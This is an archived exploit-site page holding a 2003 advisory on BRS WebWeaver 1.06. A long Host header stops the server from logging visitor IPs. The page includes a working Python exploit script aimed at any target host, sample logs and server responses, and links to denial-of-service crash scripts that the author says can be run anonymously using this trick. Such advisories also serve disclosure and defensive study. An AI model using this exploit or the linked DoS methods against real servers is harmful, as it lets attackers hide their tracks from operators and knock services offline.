exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

BRSwebweaver.txt

BRSwebweaver.txt
Posted Sep 25, 2003
Authored by euronymous

WebWeaver version 1.06 and below allows for anonymous surfing of the server if the Host field is set excessively long. It is also susceptible to various denial of services attacks.

tags | exploit, denial of service
SHA-256 | d379db7c0aee30b485cfe256c1ea095e1ecc0ca84aa0b246acdf7e56cbf677dc

BRSwebweaver.txt

Change Mirror Download
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: BRS WebWeaver: Anonymous Surfing
product: BRS WebWeaver 1.06
vendor: http://www.brswebweaver.com
risk: high
date: 09/24/2k3
discovered by: euronymous /F0KP
advisory urls: http://f0kp.iplus.ru/bz/027_en
http://f0kp.iplus.ru/bz/027_ru
contact email: euronymous at iplus dot ru
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=

0x01. Anonymous surfing
=======================

WebWeaver 1.06 and probably prior versions will allow `anonymous surfing' with
some trick. If you request the http server with long `Host' field of HTTP
packet, then Webweaver dont logs your IP adrress in server log:

HTTP Server Started - 24/Sep/2003:18:13:39
10.0.0.6 - - [24/Sep/2003:18:15:01] "GET / HTTP/1.1" 304 "-" "-"
10.0.0.6 - - [24/Sep/2003:18:15:03] "GET / HTTP/1.1" 304 "-" "-"
- - [24/Sep/2003:18:15:14] "GET / HTTP/1.1" 414 "-" "-"
- - [24/Sep/2003:18:16:01] "GET / HTTP/1.1" 414 "-" "-"
- - [24/Sep/2003:18:16:11] "GET / HTTP/1.1" 414 "-" "-"


HTTP server response:
---------------------

HTTP/1.0 414 Request-URI Too Large
Sever: BRS WebWeaver/1.06
Date: Wed, 24 Sep 2003 14:16:11 GMT
Content-Type: text/html

<HTML><HEAD><TITLE>414 Request-URI Too Large</TITLE></HEAD><BODY><H1>414 Request
-URI Too Large</H1>The requested URL's length exceeds the capacity limit for thi
s server.</BODY></HTML>


Exploit code:
-------------

#! /usr/bin/env python
##
# by euronymous [ http://f0kp.iplus.ru ]
#
# Usage: ./WWanon.py <target_host>
##

import sys, socket

H0ST = sys.argv[1]
BUF = 'fp' * 0x815F
f = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f.connect((H0ST,80))
f.send('GET / HTTP/1.1\r\n')
f.send('Host: '+BUF+'\n\n')
WWout = f.recv(1024)
f.close
print WWout


0x02. Remote crashes again
==========================

WW author was unable to fix early overflow conditions in his crappy proggie, he
is just increases the vulnerable buffer size. Therefore, you still can to crash
any WW instances with exploits, released earlier, but you have to change size of
request in exploit code. Using technik, that mentioned above, you can DoS
anonymously.

Exploit urls:

[1] http://f0kp.iplus.ru/bz/fWWhtdos.py - will crash WW with long GET request.
[2] http://f0kp.iplus.ru/bz/fadvWWhtdos.py - will crash WW with HEAD or POST


0x03. Greetings
===============

Jlx, nimber, R00T, black_c0de, OverG, f0st3r, 3APA3A and more..

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close